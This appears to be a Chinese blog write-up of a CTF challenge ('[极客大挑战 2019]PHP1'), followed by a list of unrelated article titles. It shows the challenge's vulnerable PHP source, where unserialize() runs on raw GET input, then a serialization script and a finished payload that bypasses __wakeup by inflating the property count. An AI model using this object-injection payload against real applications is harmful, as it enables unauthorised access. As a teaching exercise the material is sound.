当前位置：首页 > news >正文

19，[极客大挑战 2019]PHP1

news 2026/5/15 20:47:58

这个好玩

看到备份网站字眼，用dirsearch扫描

在kali里打开

爆破出一个www.zip文件

访问一下

解压后是这个页面

class.php

<?php

include 'flag.php';

error_reporting(0);

class Name{
private $username = 'nonono';
private $password = 'yesyes';

public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}

function __wakeup(){
$this->username = 'guest';
}

function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();

}
}
}
?>

username=admin

password=100

flag.php

<?php
$flag = 'Syc{dog_dog_dog_dog}';
?>

index.php

<!DOCTYPE html>
<head>
<meta charset="UTF-8">
<title>I have a cat!</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
<link rel="stylesheet" href="style.css">
</head>

<div id="world">
<div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 85%;left: 440px;font-family:KaiTi;">因为每次猫猫都在我键盘上乱跳，所以我有一个良好的备份网站的习惯
</div>
<div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 80%;left: 700px;font-family:KaiTi;">不愧是我！！！
</div>
<div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 70%;left: 640px;font-family:KaiTi;">
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
</div>
<div style="position: absolute;bottom: 5%;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
</div>
<script src='http://cdnjs.cloudflare.com/ajax/libs/three.js/r70/three.min.js'></script>
<script src='http://cdnjs.cloudflare.com/ajax/libs/gsap/1.16.1/TweenMax.min.js'></script>
<script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/OrbitControls.js'></script>
<script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/Cat.js'></script>
<script src="index.js"></script>
</body>
</html>

index.php中有个注释

include 'class.php';提到了class.php

$select = $_GET['select'];定义了一个存放GET请求方法的变量select

$res=unserialize(@$select);将一个字符串反序列化为一个PHP变量

<?php

class Name{

private $username = 'admin';

private $password = '100';

}

$select = new Name();

$res = serialize(@$select);

echo $res

运行得到反序列化代码

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

19，[极客大挑战 2019]PHP1

class.php

include 'flag.php';

username=admin

password=100

flag.php

index.php

index.php中有个注释

相关文章：

19，[极客大挑战 2019]PHP1

MQTT消息服务器mosquitto介绍及说明

uniapp结合movable-area与movable-view实现拖拽功能

十九(GIT2)、token、黑马就业数据平台(页面访问控制(token)、首页统计数据、登录状态失效)、axios请求及响应拦截器、Git远程仓库

文生图模型开源之光！ComfyUI - AuraFlow本地部署教程

spring boot之@Import注解的应用

【记录】用JUnit 4的@Test注解时报错java.lang.NullPointerException的原因与解决方法

Spring Boot 自动化脚本-多线程批量压缩图片

依托 Spring Boot框架，精铸高扩展性招聘信息管控系统

【前端】理解 JavaScript 对象属性访问的复杂性

Django异步视图adrf解决办法

【一文了解】C#基础-接口

活着就好20241210

多表设计 - 一对一多对多

实现 DataGridView 下拉列表功能（C# WinForms）

使用Java创建RabbitMQ消息生产者的详细指南

【LC】160. 相交链表

Spark架构及运行流程

Linux安装Python2.7.5(centos自带同款)

上传ssh公钥到目标服务器

浏览器扩展开发实战：光标交互防火墙的设计与实现

oracle 大表（1亿以上）迁移笔记一

TinyGPT-V 和 MiniGPT-4 在架构设计上的主要区别

Mermaid CLI深度解析：文本驱动图表生成在DevOps与文档自动化中的实践指南

LILY-W131-00B，支持USB与SDIO双高速主机接口的IEEE 802.11b/g/n模块

2026年3月电子学会青少年软件编程机器人技术四级等级考试试卷真题【实际操作】

从PCB布线到外壳开孔：一个智能硬件产品的EMC设计避坑全记录

告别依赖地狱：手把手教你用Docker一键部署带GUI的Kettle（避坑libwebkitgtk）

深度解析AKTools金融数据接口的HTTP API优化与数据一致性终极方案

如何利用Google Cloud服务加速OR-Tools大规模优化求解：完整实践指南